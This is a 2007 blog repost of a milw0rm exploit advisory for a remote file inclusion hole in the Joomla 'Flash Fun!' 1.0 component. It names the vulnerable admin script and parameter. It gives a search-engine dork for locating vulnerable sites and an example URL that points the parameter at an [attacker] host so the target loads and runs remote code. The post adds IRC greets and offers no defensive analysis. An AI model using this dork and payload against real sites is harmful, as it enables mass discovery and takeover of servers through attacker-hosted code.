:: Joomla Component Flash Fun! 1.0 Remote File Inclusion Vuln

September 15, 2007

:: Joomla Component Flash Fun! 1.0 Remote File Inclusion Vuln ::

Filed under: :: Vulnerabilities :: — x1024mb @ 9:13 pm

######################################
# Joomla Flash Fun! Component RFI    #
######################################

Bug in :
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joomlaflashfun"

Example:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]

Greets to all Irc.RealWorm.Net #Morgan Users

Source From Here

# milw0rm.com [2007-09-15]

Like this:

Be the first to like this post.

Leave a Comment »

No comments yet.

RSS feed for comments on this post. TrackBack URI

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

X1024mb’s other side

September 15, 2007

:: Joomla Component Flash Fun! 1.0 Remote File Inclusion Vuln ::

Like this:

Leave a Comment »

Leave a Reply Cancel reply

Follow “X1024mb's other side”